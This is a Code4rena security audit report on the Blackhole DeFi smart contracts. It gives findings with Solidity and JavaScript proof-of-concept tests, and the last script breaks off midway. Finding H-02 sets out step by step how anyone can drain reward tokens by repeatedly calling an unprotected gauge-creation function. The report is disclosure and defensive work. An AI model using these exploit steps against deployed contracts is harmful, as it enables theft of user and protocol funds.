Overview

About C4

Code4rena (C4) is a competitive audit platform where security researchers, referred to as Wardens, review, audit, and analyze codebases for security vulnerabilities in exchange for bounties provided by sponsoring projects.

A C4 audit is an event in which community participants, referred to as Wardens, review, audit, or analyze smart contract logic in exchange for a bounty provided by sponsoring projects.

During the audit outlined in this document, C4 conducted an analysis of the Blackhole smart contract system. The audit took place from May 28 to June 09, 2025.

Following the C4 audit, 3 wardens (rayss, lonelybones and maxzuvex) reviewed the mitigations for all identified issues; the mitigation review report is appended below the audit report.

Final report assembled by Code4rena.

Summary

The C4 analysis yielded an aggregated total of 24 unique vulnerabilities. Of these vulnerabilities, 2 received a risk rating in the category of HIGH severity and 22 received a risk rating in the category of MEDIUM severity.

Additionally, C4 analysis included 13 reports detailing issues with a risk rating of LOW severity or non-critical.

All of the issues presented here are linked back to their original finding, which may include relevant context from the judge and Blackhole team.

Governor findings

Of the identified vulnerabilities, 5 medium severity findings were associated with the Governor contracts.

⚠️ The Blackhole team has decided not to deploy a governor contract at this time.

The sponsors have requested the following note be included:

Blackhole has chosen not to deploy a governor contract at this stage. A more advanced version will be introduced later as per the roadmap, subject to a separate audit.

C4 has included the related findings as a separate section in this report. Original numbering is in continuous order for this section, for ease of reference.

Scope

The code under review can be found within the C4 Blackhole repository, and is composed of 116 smart contracts written in the Solidity programming language and includes 10,108 lines of Solidity code.

Severity Criteria

C4 assesses the severity of disclosed vulnerabilities based on three primary risk categories: high, medium, and low/non-critical.

High-level considerations for vulnerabilities span the following key areas when conducting assessments:

• Malicious Input Handling
• Escalation of privileges
• Arithmetic
• Gas use

For more information regarding the severity criteria referenced throughout the submission review process, please refer to the documentation provided on the C4 website, specifically our section on Severity Categorization.

High Risk Findings (2)

[H-01] Router address validation logic error prevents valid router assignment

Submitted by francoHacker, also found by AvantGard, dreamcoder, Egbe, FavourOkerri, harsh123, holtzzx, IzuMan, NexusAudits, rayss, and Sparrow

https://github.com/code-423n4/2025-05-blackhole/blob/92fff849d3b266e609e6d63478c4164d9f608e91/contracts/GenesisPoolManager.sol#L314

Finding description

The setRouter(address _router) function within the GenesisPoolManager contract is intended to allow the contract owner (owner) to modify the address of the router contract. This router is crucial for interacting with the decentralized exchange (DEX) when adding liquidity during the launch of a GenesisPool. However, the function contains a logical flaw in its require statement:

function setRouter (address _router) external onlyOwner {
    require(_router == address(0), "ZA"); // <<< LOGICAL ERROR HERE
    router = _router;
}

The line require(_router == address(0), "ZA"); currently mandates that the _router address provided as an argument must be the zero address (address(0)). If any other address (i.e., a valid, non-zero router address) is supplied, the condition _router == address(0) will evaluate to false, and the transaction will revert with the error message “ZA” (presumably “Zero Address”).

This means the setRouter function’s behavior is inverted from what its name and intended purpose imply:

• Current Behavior: It only allows the owner to set the router state variable to address(0). It does not permit updating it to a new, functional router address.
• Expected Behavior (based on name and usage): It should allow the owner to set the router state variable to a new, valid, non-zero router address, likely with a check ensuring _router is not address(0) (i.e., require(_router != address(0), "ZA");).

Root Cause

The root cause of the issue is an incorrect condition in the require statement. The developer likely intended either to ensure a non-null router address was not being set (if such a check was desired for some specific reason, though unlikely for a setter) or, probably, to ensure a non-null address was being set. Instead, the implemented condition only permits setting a null address.

Impact

The impact of this logical error is significant and can lead to several adverse consequences:

1. Inability to update the router to a functional address:

   • If the router address is initially set during the GenesisPoolManager contract’s initialization (via the initialize function) and subsequently needs to be changed (e.g., due to a DEX router upgrade, an error in the initial configuration, or the deployment of a new router version), the current setRouter function will prevent this update to a functional address. The owner would only be able to “clear” the router address by setting it to address(0).

2. Potential blocking of new pool launches (_launchPool):

   • The internal _launchPool function in GenesisPoolManager is responsible for finalizing a GenesisPool’s process and adding liquidity. This function calls IGenesisPool(_genesisPool).launch(router, MATURITY_TIME), passing the router address stored in GenesisPoolManager.
   • If the router address in GenesisPoolManager is address(0) (either because it was mistakenly set that way initially or because the owner used setRouter to “clear” it), the call to IGenesisPool.launch will attempt to interact with an IRouter(address(0)).
   • Function calls to address(0) typically fail or behave unpredictably (depending on low-level Solidity/EVM implementation details, but practically, they will fail when trying to execute non-existent code or decode empty return data). This will cause the GenesisPool’s launch function to fail, and consequently, the GenesisPoolManager’s _launchPool function will also fail.
   • As a result, no new GenesisPool reaching the launch stage can be successfully launched if the router address is address(0). Funds intended for liquidity (both nativeToken and fundingToken) could become locked in the GenesisPool contract indefinitely, or until an alternative solution is implemented (if possible via governance or contract upgradeability).

3. Dependency on correct initial configuration:

   • The system becomes overly reliant on the router address being perfectly configured during the initialize call. If there’s a typo or an incorrect address is provided, there is no way to correct it via setRouter unless the contract is upgradeable and the setRouter logic itself is updated.

4. Misleading functionality:

   • The function name setRouter is misleading, as it doesn’t “set” a functional router but rather only “clears” it (sets it to address(0)). This can lead to administrative errors and confusion.

Severity

High. Although the function is only accessible by the owner, its malfunction directly impacts a core functionality of the system (pool launching and liquidity provision). If the router needs to be changed or is misconfigured, this vulnerability can halt a critical part of the protocol.

Recommended mitigation steps

The condition in the setRouter function must be corrected to allow setting a non-null router address. The more common and expected logic would be:

function setRouter (address _router) external onlyOwner {
    require(_router != address(0), "ZA"); // CORRECTION: Ensure the new router is not the zero address.
    router = _router;
}

This correction would enable the owner to update the router address to a new, valid address, ensuring the operational continuity and flexibility of the GenesisPoolManager.

Proof of Concept

1. Deploy a mock GenesisPoolManager.
2. Deploy mock contracts for IRouter (just to have distinct addresses).
3. Show that the owner cannot set a new, non-zero router address.
4. Show that the owner can set the router address to address(0).
5. Illustrate (conceptually, as a full launch is complex) how a zero router address would break the _launchPool (or rather, the launch function it calls).

// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.13;

import "forge-std/Test.sol";
import "forge-std/console.sol";

// Minimal IRouter interface needed for the PoC
interface IRouter {
    function someRouterFunction() external pure returns (bool);
}

// Minimal IGenesisPool interface needed for the PoC
interface IGenesisPool {
    function launch(address router, uint256 maturityTime) external;
    function getGenesisInfo() external view returns (IGenesisPoolBase.GenesisInfo memory);
    function getLiquidityPoolInfo() external view returns (IGenesisPoolBase.LiquidityPool memory);
}

// Minimal IGenesisPoolBase (for structs)
interface IGenesisPoolBase {
    struct GenesisInfo {
        address tokenOwner;
        address nativeToken;
        address fundingToken;
        bool stable;
        uint256 startTime;
        uint256 duration;
        uint256 threshold; // 10000 = 100%
        uint256 startPrice;
        uint256 supplyPercent;
        uint256 maturityTime;
    }

    struct LiquidityPool {
        address pairAddress;
        address gaugeAddress;
        address internal_bribe;
        address external_bribe;
    }
}

// Minimal IGauge interface needed for the PoC
interface IGauge {
    function setGenesisPool(address _genesisPool) external;
}

// Minimal IBaseV1Factory interface needed for the PoC
interface IBaseV1Factory {
    function setGenesisStatus(address _pair, bool status) external;
}

// --- Mock Contracts ---

// A very simple mock router
contract MockRouter is IRouter {
    bool public wasCalled = false;
    function someRouterFunction() external pure override returns (bool) {
        return true;
    }
    // Dummy addLiquidity to avoid reverts when called by MockGenesisPool
    function addLiquidity(address, address, bool, uint256, uint256, uint256, uint256, address, uint256) external returns (uint256, uint256, uint256) {
        wasCalled = true;
        return (1,1,1);
    }
}

// A very simple mock GenesisPool
contract MockGenesisPool is IGenesisPool, IGenesisPoolBase {
    address public currentRouter;
    bool public launchCalled = false;
    GenesisInfo public genesisInfo; // To satisfy getGenesisInfo
    LiquidityPool public liquidityPoolInfo; // To satisfy getLiquidityPoolInfo

    function launch(address _router, uint256 /*maturityTime*/) external override {
        launchCalled = true;
        currentRouter = _router;
        if (_router == address(0)) {
            revert("Router is address(0)"); // Simulate failure if router is zero
        }
        // Simulate interaction with the router
        IRouter(_router).addLiquidity(address(0), address(0), false, 0,0,0,0, address(0),0);
    }
    function getGenesisInfo() external view override returns (GenesisInfo memory) { return genesisInfo; }
    function getLiquidityPoolInfo() external view override returns (LiquidityPool memory) { return liquidityPoolInfo; }
}

// A simplified GenesisPoolManager containing the vulnerable function
// and a conceptual _launchPool
contract SimplifiedGenesisPoolManager {
    address public owner;
    address public router; // The vulnerable state variable
    IBaseV1Factory public pairFactory; // Added for _launchPool
    uint256 public MATURITY_TIME;     // Added for _launchPool

    event RouterSet(address newRouter);

    modifier onlyOwner() {
        require(msg.sender == owner, "Not owner");
        _;
    }

    constructor(address _initialRouter, address _pairFactory) {
        owner = msg.sender;
        router = _initialRouter;
        pairFactory = IBaseV1Factory(_pairFactory);
        MATURITY_TIME = 1 weeks;
    }

    // The vulnerable function
    function setRouter(address _router) external onlyOwner {
        require(_router == address(0), "ZA"); // The logical error
        router = _router;
        emit RouterSet(_router);
    }

    // Conceptual launch pool function to demonstrate impact
    // In a real scenario, _genesisPool would be a parameter or fetched
    function _launchPool(IGenesisPool _genesisPool) internal {
        // Simplified steps from the actual GenesisPoolManager._launchPool
        // Assume liquidityPoolInfo.pairAddress and liquidityPoolInfo.gaugeAddress are set on _genesisPool
        // IBaseV1Factory(pairFactory).setGenesisStatus(IGenesisPool(_genesisPool).getLiquidityPoolInfo().pairAddress, false); // Simplified
        // IGauge(IGenesisPool(_genesisPool).getLiquidityPoolInfo().gaugeAddress).setGenesisPool(address(_genesisPool)); // Simplified

        _genesisPool.launch(router, MATURITY_TIME); // This will use the (potentially zero) router
    }

    // Public wrapper for testing _launchPool
    function testLaunch(IGenesisPool _genesisPool) external onlyOwner {
        _launchPool(_genesisPool);
    }

    function getRouter() external view returns (address) {
        return router;
    }
}

// Mock for IBaseV1Factory
contract MockPairFactory is IBaseV1Factory {
    function setGenesisStatus(address _pair, bool status) external {}
    // Dummy implementations for other functions if needed by compiler for interface
    function isPair(address pair) external view returns (bool) { return false; }
    function getPair(address tokenA, address token, bool stable) external view returns (address) { return address(0); }
    function createPair(address tokenA, address tokenB, bool stable) external returns (address pair) { return address(0); }
    function setGenesisPool(address _genesisPool) external {}
}

// --- Test Contract ---
contract GenesisPoolManagerRouterTest is Test {
    SimplifiedGenesisPoolManager internal manager;
    MockRouter internal initialRouter;
    MockRouter internal newValidRouter;
    MockGenesisPool internal mockPool;
    MockPairFactory internal mockPairFactory;

address internal owner;
    address internal nonOwner;

    function setUp() public {
        owner = address(this); // Test contract itself is the owner
        nonOwner = address(0xBAD);

        initialRouter = new MockRouter();
        newValidRouter = new MockRouter();
        mockPool = new MockGenesisPool();
        mockPairFactory = new MockPairFactory();

        manager = new SimplifiedGenesisPoolManager(address(initialRouter), address(mockPairFactory));

        // Sanity check initial router
        assertEq(manager.getRouter(), address(initialRouter), "Initial router not set correctly");
    }

    function test_ownerCannotSetValidNewRouter() public {
        vm.prank(owner);
        vm.expectRevert("ZA"); // Expect ZA (Zero Address) error due to the faulty require
        manager.setRouter(address(newValidRouter));

        // Router should remain unchanged
        assertEq(manager.getRouter(), address(initialRouter), "Router was changed when it shouldn't have been");
    }

    function test_ownerCanSetRouterToZeroAddress() public {
        vm.prank(owner);
        manager.setRouter(address(0)); // This call will succeed

        assertEq(manager.getRouter(), address(0), "Router was not set to address(0)");
    }

    function test_nonOwnerCannotCallSetRouter() public {
        vm.prank(nonOwner);
        vm.expectRevert("Not owner");
        manager.setRouter(address(newValidRouter));

        vm.prank(nonOwner);
        vm.expectRevert("Not owner");
        manager.setRouter(address(0));
    }

    function test_launchFailsIfRouterIsZero() public {
        // First, owner sets router to address(0)
        vm.prank(owner);
        manager.setRouter(address(0));
        assertEq(manager.getRouter(), address(0), "Router setup for test failed");

        // Now, owner tries to launch a pool
        vm.prank(owner);
        // The mockPool's launch function will revert if router is address(0)
        // Also, the call to IRouter(address(0)).addLiquidity would revert.
        vm.expectRevert("Router is address(0)");
        manager.testLaunch(mockPool);

        assertFalse(mockPool.launchCalled(), "Launch should not have been successfully called on pool due to revert");
    }

    function test_launchSucceedsIfRouterIsValid() public {
        // Ensure router is the initial, valid one
        assertEq(manager.getRouter(), address(initialRouter), "Initial router setup for test failed");

        // Owner tries to launch a pool
        vm.prank(owner);
        manager.testLaunch(mockPool); // This should succeed

        assertTrue(mockPool.launchCalled(), "Launch was not called on pool");
        assertEq(mockPool.currentRouter(), address(initialRouter), "Pool was launched with incorrect router");
        assertTrue(initialRouter.wasCalled(), "Router's addLiquidity was not called");
    }
}

Explanation of the PoC

1. SimplifiedGenesisPoolManager:

   • Contains the owner, router state variable, and the vulnerable setRouter function exactly as described.
   • Includes a constructor to set the initial owner and router.
   • Includes _launchPool and testLaunch to simulate the scenario where a zero router would cause a failure.
2. MockRouter: A simple contract implementing IRouter. Its addLiquidity function sets a flag wasCalled to verify interaction.

3. MockGenesisPool:

   • Implements a launch function.
   • Crucially, launch will revert("Router is address(0)"); if the _router argument is address(0), mimicking how a real launch would fail if it tried to call IRouter(address(0)).addLiquidity(...).
   • It also attempts to call IRouter(_router).addLiquidity to show a successful interaction.
4. MockPairFactory: A minimal mock for IBaseV1Factory to satisfy dependencies in the simplified _launchPool.

5. GenesisPoolManagerRouterTest (Test Contract):

   • setUp(): Deploys the SimplifiedGenesisPoolManager, MockRouter instances, MockGenesisPool, and sets the test contract as the owner.

   • test_ownerCannotSetValidNewRouter():

     • The owner attempts to call setRouter with newValidRouter (a non-zero address).
     • vm.expectRevert("ZA"); asserts that this call reverts with the “ZA” error, proving the require(_router == address(0), "ZA"); condition is problematic for valid addresses.

   • test_ownerCanSetRouterToZeroAddress():

     • The owner calls setRouter with address(0).
     • This call succeeds, and the test asserts that manager.getRouter() is now address(0).
   • test_nonOwnerCannotCallSetRouter(): Standard access control test.

   • test_launchFailsIfRouterIsZero():

     • The owner first successfully calls setRouter(address(0)).
     • Then, the owner calls manager.testLaunch(mockPool).
     • vm.expectRevert("Router is address(0)"); asserts that this call reverts. The revert comes from MockGenesisPool.launch() when it detects the zero address router, demonstrating the downstream failure.

   • test_launchSucceedsIfRouterIsValid():

     • Ensures the router is the initial valid one.
     • The owner calls manager.testLaunch(mockPool).
     • This call should succeed, mockPool.launchCalled() should be true, and initialRouter.wasCalled() should be true.

How to Run (with Foundry):

1. Save the code above as test/GenesisPoolManagerRouter.t.sol (or similar) in your Foundry project.
2. Ensure you have forge-std (usually included with forge init).
3. Run the tests: forge test --match-test GenesisPoolManagerRouterTest -vvv (the -vvv provides more verbose output, including console logs if you were to add them).

This PoC clearly demonstrates:

• The setRouter function’s flawed logic.
• The owner’s inability to set a new, functional router.
• The owner’s ability to set the router to address(0).
• The direct consequence of a zero router address leading to failed pool launches.

Blackhole mitigated

Status: Mitigation confirmed. Full details in reports from rayss, lonelybones and maxvzuvex.

[H-02] Reward token in GaugeFactoryCL can be drained by anyone

Submitted by danzero, also found by a39955720, bareli, DarkeEEandMe, Kariukigithinji, mahadev, maxzuvex, wafflewizard, wankleven, and Ziusz

https://github.com/code-423n4/2025-05-blackhole/blob/92fff849d3b266e609e6d63478c4164d9f608e91/contracts/AlgebraCLVe33/GaugeFactoryCL.sol#L59

Findings Description and Impact

The GaugeFactoryCL.sol contract, responsible for creating GaugeCL instances for Algebra Concentrated Liquidity pools, has a public createGauge function. Below is the implementation of the function:

    function createGauge(address _rewardToken,address _ve,address _pool,address _distribution, address _internal_bribe, address _external_bribe, bool _isPair, 
                        IGaugeManager.FarmingParam memory farmingParam, address _bonusRewardToken) external returns (address) {

createEternalFarming(_pool, farmingParam.algebraEternalFarming, _rewardToken, _bonusRewardToken);
        last_gauge = address(new GaugeCL(_rewardToken,_ve,_pool,_distribution,_internal_bribe,_external_bribe,_isPair, farmingParam, _bonusRewardToken, address(this)));
        __gauges.push(last_gauge);
        return last_gauge;
    }

The GaugeFactoryCL.createGauge function lacks access control, allowing any external actor to call it. This function, in turn, calls an internal createEternalFarming function. Below is the implementation of the createEternalFarming function:

    function createEternalFarming(address _pool, address _algebraEternalFarming, address _rewardToken, address _bonusRewardToken) internal {
        IAlgebraPool algebraPool = IAlgebraPool(_pool);
        uint24 tickSpacing = uint24(algebraPool.tickSpacing());
        address pluginAddress = algebraPool.plugin();        
        IncentiveKey memory incentivekey = getIncentiveKey(_rewardToken, _bonusRewardToken, _pool, _algebraEternalFarming);
        uint256 remainingTimeInCurrentEpoch = BlackTimeLibrary.epochNext(block.timestamp) - block.timestamp;
        uint128 reward = 1e10;
        uint128 rewardRate = uint128(reward/remainingTimeInCurrentEpoch);
        
        IERC20(_rewardToken).safeApprove(_algebraEternalFarming, reward);
        address customDeployer = IAlgebraPoolAPIStorage(algebraPoolAPIStorage).pairToDeployer(_pool);
        IAlgebraEternalFarming.IncentiveParams memory incentiveParams = 
            IAlgebraEternalFarming.IncentiveParams(reward, 0, rewardRate, 0, tickSpacing);
        IAlgebraEternalFarmingCustom(_algebraEternalFarming).createEternalFarming(incentivekey, incentiveParams, pluginAddress, customDeployer);
    }

It is designed to seed a new Algebra eternal farming incentive with an initial, hardcoded amount of 1e10 of the _rewardToken. It achieves this by having GaugeFactoryCL approve the algebraEternalFarming contract, which is then expected to pull these tokens from GaugeFactoryCL.

If the GaugeFactoryCL contract is pre-funded with reward tokens to facilitate this initial seeding for legitimate gauges, an attacker can repeatedly call the createGauge function which will trigger the createEternalFarming process, causing the reward token to be transferred from GaugeFactoryCL to a new Algebra farm associated with a pool specified by the attacker ultimately draining the reward token from the GaugeFactoryCL contract.

The attacker can then potentially stake a Liquidity Provider (LP) NFT into this newly created (spam) GaugeCL and its associated Algebra farm, and subsequently claim that reward.

Recommended mitigation steps

Implement robust access control on the GaugeFactoryCL.createGauge() function, restricting its execution to authorized administrators or designated smart contracts, thereby preventing unauthorized calls.

Proof of Concept

1. Protocol admin pre-funds GaugeFactoryCL with 5e10 of USDC (50,000).
2. Attacker calls GaugeFactoryCL.createGauge():

 IGaugeFactoryCL(GFCL_ADDRESS).createGauge(
     USDC_ADDRESS,       // _rewardToken
     VE_ADDRESS,
     TARGET_POOL_ADDRESS,
     ATTACKER_ADDRESS,   // _distribution
     ATTACKER_ADDRESS,   // _internal_bribe
     ATTACKER_ADDRESS,   // _external_bribe
     true,               // _isPair
     farmingParams,      // including ALGEBRA_ETERNAL_FARMING_ADDRESS
     ZERO_ADDRESS        // _bonusRewardToken
 );

3. The public createGauge function is entered which calls its internal createEternalFarming(_pool, farmingParam.algebraEternalFarming, USDC_ADDRESS, _bonusRewardToken).
4. Execution within GaugeFactoryCL.createEternalFarming():

function createEternalFarming(address _pool, address _algebraEternalFarming, address _rewardToken, address _bonusRewardToken) internal {
    // ...
    uint128 reward = 1e10; // 10,000 USDC
    // ...
    // GaugeFactoryCL approves AlgebraEternalFarming to spend its USDC
    IERC20(_rewardToken /* USDC_ADDRESS */).safeApprove(_algebraEternalFarming, reward);
    // ...
    // Call to AlgebraEternalFarming which will pull the approved USDC
    IAlgebraEternalFarmingCustom(_algebraEternalFarming).createEternalFarming(incentivekey, incentiveParamsWithReward, pluginAddress, customDeployer);
}

5. Execution within AlgebraEternalFarming.createEternalFarming() here:

/// @inheritdoc IAlgebraEternalFarming
  function createEternalFarming(
    IncentiveKey memory key,
    IncentiveParams memory params,
    address plugin
  ) external override onlyIncentiveMaker returns (address virtualPool) {
    address connectedPlugin = key.pool.plugin();
    if (connectedPlugin != plugin || connectedPlugin == address(0)) revert pluginNotConnected();
    if (IFarmingPlugin(connectedPlugin).incentive() != address(0)) revert anotherFarmingIsActive();

    virtualPool = address(new EternalVirtualPool(address(this), connectedPlugin));
    IFarmingCenter(farmingCenter).connectVirtualPoolToPlugin(virtualPool, IFarmingPlugin(connectedPlugin));

    key.nonce = numOfIncentives++;
    incentiveKeys[address(key.pool)] = key;
    bytes32 incentiveId = IncentiveId.compute(key);
    Incentive storage newIncentive = incentives[incentiveId];

    (params.reward, params.bonusReward) = _receiveRewards(key, params.reward, params.bonusReward, newIncentive);
    if (params.reward == 0) revert zeroRewardAmount();

    unchecked {
      if (int256(uint256(params.minimalPositionWidth)) > (int256(TickMath.MAX_TICK) - int256(TickMath.MIN_TICK)))
        revert minimalPositionWidthTooWide();
    }
    newIncentive.virtualPoolAddress = virtualPool;
    newIncentive.minimalPositionWidth = params.minimalPositionWidth;
    newIncentive.pluginAddress = connectedPlugin;

    emit EternalFarmingCreated(
      key.rewardToken,
      key.bonusRewardToken,
      key.pool,
      virtualPool,
      key.nonce,
      params.reward,
      params.bonusReward,
      params.minimalPositionWidth
    );

    _addRewards(IAlgebraEternalVirtualPool(virtualPool), params.reward, params.bonusReward, incentiveId);
    _setRewardRates(IAlgebraEternalVirtualPool(virtualPool), params.rewardRate, params.bonusRewardRate, incentiveId);
  }

6. It calls the _receiveRewards function here:

  function _receiveRewards(
    IncentiveKey memory key,
    uint128 reward,
    uint128 bonusReward,
    Incentive storage incentive
  ) internal returns (uint128 receivedReward, uint128 receivedBonusReward) {
    if (!unlocked) revert reentrancyLock();
    unlocked = false; // reentrancy lock
    if (reward > 0) receivedReward = _receiveToken(key.rewardToken, reward);
    if (bonusReward > 0) receivedBonusReward = _receiveToken(key.bonusRewardToken, bonusReward);
    unlocked = true;

    (uint128 _totalRewardBefore, uint128 _bonusRewardBefore) = (incentive.totalReward, incentive.bonusReward);
    incentive.totalReward = _totalRewardBefore + receivedReward;
    incentive.bonusReward = _bonusRewardBefore + receivedBonusReward;
  }

7. It calls the _receiveToken function here:

  function _receiveToken(IERC20Minimal token, uint128 amount) private returns (uint128) {
    uint256 balanceBefore = _getBalanceOf(token);
    TransferHelper.safeTransferFrom(address(token), msg.sender, address(this), amount);
    uint256 balanceAfter = _getBalanceOf(token);
    require(balanceAfter > balanceBefore);
    unchecked {
      uint256 received = balanceAfter - balanceBefore;
      if (received > type(uint128).max) revert invalidTokenAmount();
      return (uint128(received));
    }
  }

8. 1e10 (10,000) USDC has been transferred to the new algebra farm.
9. Attacker repeats step 2 to 6 for 5 times to fully transfer 50,000 USDC out of the GaugeCLFactory contract.
10. Attacker stakes relevant LP NFT into the spam gauges through the GaugeCL.deposit function:

    function deposit(uint256 tokenId) external nonReentrant isNotEmergency {
        require(msg.sender == nonfungiblePositionManager.ownerOf(tokenId));
        
        nonfungiblePositionManager.approveForFarming(tokenId, true, farmingParam.farmingCenter);

        (IERC20Minimal rewardTokenAdd, IERC20Minimal bonusRewardTokenAdd, IAlgebraPool pool, uint256 nonce) = 
                algebraEternalFarming.incentiveKeys(poolAddress);
        IncentiveKey memory incentivekey = IncentiveKey(rewardTokenAdd, bonusRewardTokenAdd, pool, nonce);
        farmingCenter.enterFarming(incentivekey, tokenId);
        emit Deposit(msg.sender, tokenId);
    }

11. Attacker directly calls the AlgebraEternalFarming.claimReward function to claim the rewards here:

  /// @inheritdoc IAlgebraEternalFarming
  function claimReward(IERC20Minimal rewardToken, address to, uint256 amountRequested) external override returns (uint256 reward) {
    return _claimReward(rewardToken, msg.sender, to, amountRequested);
  }

  function _claimReward(IERC20Minimal rewardToken, address from, address to, uint256 amountRequested) internal returns (uint256 reward) {
    if (to == address(0)) revert claimToZeroAddress();
    mapping(IERC20Minimal => uint256) storage userRewards = rewards[from];
    reward = userRewards[rewardToken];

    if (amountRequested == 0 || amountRequested > reward) amountRequested = reward;

    if (amountRequested > 0) {
      unchecked {
        userRewards[rewardToken] = reward - amountRequested;
      }
      TransferHelper.safeTransfer(address(rewardToken), to, amountRequested);
      emit RewardClaimed(to, amountRequested, address(rewardToken), from);
    }
  }

Blackhole commented:

Blackhole Protocol disputes the classification of this issue as high severity, noting that the protocol is designed to deposit no more than $0.10 worth of BLACK tokens, an amount sufficient to spawn over a million liquidity pools on Blackhole.

Blackhole mitigated

Status: Mitigation confirmed. Full details in reports from lonelybones and rayss.

Medium Risk Findings (13)

[M-01] MinterUpgradeable: double-subtracting smNFT burns causes rebase underpayment

Submitted by lonelybones, also found by Akxai, codexNature, hakunamatata, and holtzzx

https://github.com/code-423n4/2025-05-blackhole/blob/main/contracts/VotingEscrow.sol#L297

Finding description and impact

Root Cause: Incorrect circulatingBlack calculation in MinterUpgradeable.calculate_rebase()

The MinterUpgradeable.calculate_rebase() function (contracts/MinterUpgradeable.sol#L132) incorrectly calculates circulatingBlack when Supermassive NFTs (smNFTs) are present.

1. smNFT Creation Burns BLACK: BLACK tokens are burned when smNFTs are created/augmented in VotingEscrow.sol (e.g., contracts/VotingEscrow.sol#L796, #L933). This correctly reduces BLACK.totalSupply() (contracts/Black.sol#L97).
2. _blackTotal is Post-Burn Supply: MinterUpgradeable.calculate_rebase() reads this already-reduced totalSupply into _blackTotal (contracts/MinterUpgradeable.sol#L127).
3. Double Subtraction Flaw: The calculation for circulatingBlack effectively becomes _blackTotal - _veTotal - _smNFTBalance. Since _blackTotal is already net of the burned _smNFTBalance, _smNFTBalance is erroneously subtracted twice.

Impact

Misallocation of minted emissions (high severity): this double-subtraction results in an artificially low circulatingBlack value. The rebase formula (Rebase ~ _weeklyMint * (circulatingBlack / blackSupply)^2 / 2) is highly sensitive to this error.

• Understated Rebase: The rebaseAmount paid to RewardsDistributor (for LPs/stakers) is significantly lower than intended.
• Overstated Gauge Emissions: Consequently, emissions allocated to gauges (_gauge = _emission - _rebase - _teamEmissions) are significantly overstated.
• Economic Imbalance: This systematically diverts value from LPs/stakers to veBLACK voters who direct gauge emissions, undermining the protocol’s economic model. The misallocation is persistent and scales with the total _smNFTBalance.

The Proof of Concept demonstrates this flaw, leading to a tangible misdirection of emissions each epoch. This directly affects a new core feature (smNFTs) and critical system logic.

Recommended mitigation steps

Correct the circulatingBlack calculation in MinterUpgradeable.calculate_rebase() (contracts/MinterUpgradeable.sol#L132).

Given _blackTotal = _black.totalSupply() (already reduced by smNFT burns) and _veTotal = _black.balanceOf(address(_ve)):

Corrected circulatingBlack calculation:

// In MinterUpgradeable.calculate_rebase()
uint circulatingBlack_corrected = _blackTotal - _veTotal;

This ensures _smNFTBalance (representing tokens already removed from _blackTotal) is not subtracted again. The blackSupply denominator (_blackTotal + _superMassiveBonus) can remain, as it reflects an effective total supply including smNFT bonus effects.

Proof of Concept

A Hardhat test (test/poc-rebase-miscalculation.js), utilizing necessary mock contracts, has been developed to demonstrate the vulnerability.

The PoC executes the following key steps:

1. Deploys core contracts (Black, VotingEscrow, MinterUpgradeable) and required mocks.
2. Creates both a standard veNFT lock and a Supermassive NFT (smNFT), triggering the BLACK token burn for the smNFT.
3. Advances time to enable a new minting period via MinterUpgradeable.update_period().
4. Compares rebase calculations: It invokes MinterUpgradeable.calculate_rebase() and compares this value to a manually corrected calculation that rectifies the double-subtraction of _smNFTBalance.

5. Verifies emission misallocation: It calls MinterUpgradeable.update_period() to perform the actual minting and distribution. It then asserts that:

   • The BLACK tokens transferred to the (mocked) RewardsDistributor match the contract’s flawed, lower rebase calculation.
   • The BLACK tokens approved for the (mocked) GaugeManager are consequently higher than they would be with a correct rebase, and this excess precisely matches the amount miscalculated from the rebase.

Key findings demonstrated by the PoC:

• The contract’s calculate_rebase() function yields a significantly lower rebase amount than the correctly calculated value when _smNFTBalance > 0.
• This understated rebase amount is what is actually distributed.
• The difference (the “misallocated amount”) is verifiably diverted towards gauge emissions.

The full PoC script and mock contracts will be provided below. The test passes and includes detailed console logs to trace the state and calculations.

poc_rebase_miscalculation.js:

const { expect } = require("chai");
const { ethers, network } = require("hardhat");

describe("MinterUpgradeable - Rebase Miscalculation PoC", function () {
    let deployer, user1, team; // Signers
    let blackToken, votingEscrow, minter, gaugeManagerMock, rewardsDistributorMock, blackGovernorMock;
    let votingBalanceLogic, votingDelegationLib; // Libraries

    const WEEK = 1800; 
    const PRECISION = ethers.BigNumber.from("10000");
    const TOKEN_DECIMALS = 18; // For formatting ethers

    async function setupContracts() {
        [deployer, user1, team] = await ethers.getSigners();

        const BlackFactory = await ethers.getContractFactory("Black");
        blackToken = await BlackFactory.deploy();
        await blackToken.deployed();

        if (!(await blackToken.initialMinted())) {
            await blackToken.connect(deployer).initialMint(deployer.address);
        }
        const initialUserTokens = ethers.utils.parseEther("1000000");
        await blackToken.connect(deployer).transfer(user1.address, initialUserTokens);

        const VotingBalanceLogicFactory = await ethers.getContractFactory("VotingBalanceLogic");
        votingBalanceLogic = await VotingBalanceLogicFactory.deploy();
        await votingBalanceLogic.deployed();

        const VotingDelegationLibFactory = await ethers.getContractFactory("VotingDelegationLib");
        votingDelegationLib = await VotingDelegationLibFactory.deploy();
        await votingDelegationLib.deployed();

        const VotingEscrowFactory = await ethers.getContractFactory("VotingEscrow", {
            libraries: { VotingBalanceLogic: votingBalanceLogic.address },
        });
        votingEscrow = await VotingEscrowFactory.deploy(blackToken.address, ethers.constants.AddressZero, ethers.constants.AddressZero);
        await votingEscrow.deployed();
        if ((await votingEscrow.team()) !== team.address) {
            await votingEscrow.connect(deployer).setTeam(team.address);
        }

        const GaugeManagerMockFactory = await ethers.getContractFactory("GaugeManagerMock");
        gaugeManagerMock = await GaugeManagerMockFactory.deploy();
        await gaugeManagerMock.deployed();

        const RewardsDistributorMockFactory = await ethers.getContractFactory("RewardsDistributorMock");
        rewardsDistributorMock = await RewardsDistributorMockFactory.deploy();
        await rewardsDistributorMock.deployed();

        const BlackGovernorMockFactory = await ethers.getContractFactory("BlackGovernorMock");
        blackGovernorMock = await BlackGovernorMockFactory.deploy();
        await blackGovernorMock.deployed();
        await gaugeManagerMock.setBlackGovernor(blackGovernorMock.address);

        const MinterFactory = await ethers.getContractFactory("MinterUpgradeable");
        minter = await MinterFactory.deploy();
        await minter.deployed();
        await minter.connect(deployer).initialize(gaugeManagerMock.address, votingEscrow.address, rewardsDistributorMock.address);
        if ((await minter.team()) !== team.address) {
            await minter.connect(deployer).setTeam(team.address);
            await minter.connect(team).acceptTeam();
        }
        await minter.connect(deployer)._initialize([], [], 0);
        await blackToken.connect(deployer).setMinter(minter.address);
        await blackToken.connect(user1).approve(votingEscrow.address, ethers.constants.MaxUint256);
    }

    async function advanceToNextMintingPeriod(minterContract) {
        let currentActivePeriod = await minterContract.active_period();
